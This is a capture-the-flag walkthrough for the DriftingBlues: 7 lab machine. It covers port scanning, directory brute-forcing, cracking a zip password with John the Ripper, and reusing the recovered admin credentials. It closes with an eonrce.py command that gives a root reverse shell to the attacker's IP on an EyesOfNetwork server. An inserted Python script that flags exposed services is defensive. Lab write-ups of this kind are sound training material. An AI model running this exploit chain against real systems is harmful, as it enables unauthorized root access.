Box info:
Name: DriftingBlues: 7
OS: Linux
Rated Difficulty: 🟩🟩(easy)
====================================================================
A full port scan with Nmap found 8 open ports; the service and script scan (-sC -sV) of those ports gives:
$ nmap -p22,66,80,111,443,2403,3306,8086 -sC -sV 192.168.0.85
Starting Nmap 7.91 ( https://nmap.org ) at 2021-04-15 17:48 EEST
Nmap scan report for 192.168.0.85
Host is up (0.00076s latency).

PORT     STATE SERVICE        VERSION
22/tcp   open  ssh            OpenSSH 7.4 (protocol 2.0)
| ssh-hostkey:
|   2048 c4:fa:e5:5f:88:c1:a1:f0:51:8b:ae:e3:fb:c1:27:72 (RSA)
|   256 01:97:8b:bf:ad:ba:5c:78:a7:45:90:a1:0a:63:fc:21 (ECDSA)
|_  256 45:28:39:e0:1b:a8:85:e0:c0:b0:fa:1f:00:8c:5e:d1 (ED25519)
66/tcp   open  http           SimpleHTTPServer 0.6 (Python 2.7.5)
|_http-server-header: SimpleHTTP/0.6 Python/2.7.5
|_http-title: Scalable Cost Effective Cloud Storage for Developers
80/tcp   open  http           Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3 )
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3
|_http-title: Did not follow redirect to https://192.168.0.85/
111/tcp  open  rpcbind        2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|_  100000  3,4          111/udp6  rpcbind
443/tcp  open  ssl/http       Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3 )
|_http-server-header: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips mod_fcgid/2.3.9 PHP/5.4.16 mod_perl/2.0.11 Perl/v5.16.3
| http-title: EyesOfNetwork
|_Requested resource was /login.php##
| ssl-cert: Subject: commonName=localhost/organizationName=SomeOrganization/stateOrProvinceName=SomeState/countryName=--
| Not valid before: 2021-04-03T14:37:22
|_Not valid after:  2022-04-03T14:37:22
|_ssl-date: TLS randomness does not represent time
2403/tcp open  taskmaster2000?
3306/tcp open  mysql          MariaDB (unauthorized)
8086/tcp open  http           InfluxDB http admin 1.7.9
|_http-title: Site doesn't have a title (text/plain; charset=utf-8).
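As an added example (not part of the original writeup), the script below parses a PORT/STATE/SERVICE/VERSION table like the one above into an inventory and flags the rows a defender would want to review first; the sample input is constructed from the rows above (version strings shortened) and the review rules are my own, not an Nmap feature.

```python
import re

# Constructed sample input: the PORT/STATE/SERVICE/VERSION rows from the scan above.
SAMPLE_SCAN = """\
PORT     STATE SERVICE  VERSION
22/tcp   open  ssh      OpenSSH 7.4 (protocol 2.0)
66/tcp   open  http     SimpleHTTPServer 0.6 (Python 2.7.5)
80/tcp   open  http     Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
| http-title: Did not follow redirect to https://192.168.0.85/
111/tcp  open  rpcbind  2-4 (RPC #100000)
443/tcp  open  ssl/http Apache httpd 2.4.6 ((CentOS) OpenSSL/1.0.2k-fips PHP/5.4.16)
2403/tcp open  taskmaster2000?
3306/tcp open  mysql    MariaDB (unauthorized)
8086/tcp open  http     InfluxDB http admin 1.7.9
"""

# One table row: "<port>/<proto> <state> <service> [<version...>]"; NSE script lines ("| ...") never match.
PORT_ROW = re.compile(r"^(\d+)/(tcp|udp)\s+(\S+)\s+(\S+)\s*(.*)$")

def parse_nmap_ports(text):
    """Turn nmap -sV table rows into dicts; headers, blank lines and script output are skipped."""
    rows = []
    for line in text.splitlines():
        m = PORT_ROW.match(line.strip())
        if m:
            port, proto, state, service, version = m.groups()
            rows.append({"port": int(port), "proto": proto, "state": state,
                         "service": service, "version": version.strip()})
    return rows

def flag_exposures(rows):
    """Map port -> reasons to review it. Rules are constructed for this example."""
    flags = {}
    for r in rows:
        if r["state"] != "open":
            continue
        reasons = []
        if r["service"] in ("http", "ssl/http") and r["port"] not in (80, 443):
            reasons.append("web service on a non-standard port")
        if "SimpleHTTPServer" in r["version"]:
            reasons.append("Python development file server serving a directory as-is")
        if r["service"] == "mysql":
            reasons.append("database listener reachable from the scanning host")
        if r["service"] == "rpcbind":
            reasons.append("portmapper exposed; normally firewalled")
        if r["service"].endswith("?"):
            reasons.append("unidentified service, verify manually")
        if reasons:
            flags[r["port"]] = reasons
    return flags
```

Run `flag_exposures(parse_nmap_ports(SAMPLE_SCAN))` to get the review list; ports 80 and 443 are left out because the rules only single out web services on unusual ports.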
Checking port 66, which serves a website:
Gobuster results for port 66:
$ gobuster dir -u http://192.168.0.85:66/ -w /usr/share/wordlists/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,txt
/user.txt     (Status: 200)
/root.txt     (Status: 200)
/index_files  (Status: 301)
/eon
The only interesting directory is /eon. Accessing it downloads a file (application.zip), which turns out to be a password-protected archive.
We'll use John the Ripper to find the password for the zip file we just downloaded.
First, use zip2john to create a hash from the zip file:
$ /usr/sbin/zip2john application.zip > hash
Now we can use john to crack the hash:
$ sudo john -wordlist=/usr/share/wordlists/rockyou.txt hash
Password: k[redacted]
Now we can extract the content of the zip file, which is a single file named creds.txt:
username: admin
password: is[redacted]
Using the credentials we've found, we'll move on to the next port: port 80, which redirects to port 443 (the EyesOfNetwork login page) when accessed.
After some research I found this exploit for EyesOfNetwork: https://github.com/h4knet/eonrce
From that GitHub repository we'll use eonrce.py like this:
$ ./eonrce.py https://<MACHINE IP>/ -user admin -password 'is[redacted]' -ip <YOUR IP> -port <PORT>
Now if we execute the above script, we'll get a reverse shell on the box as root.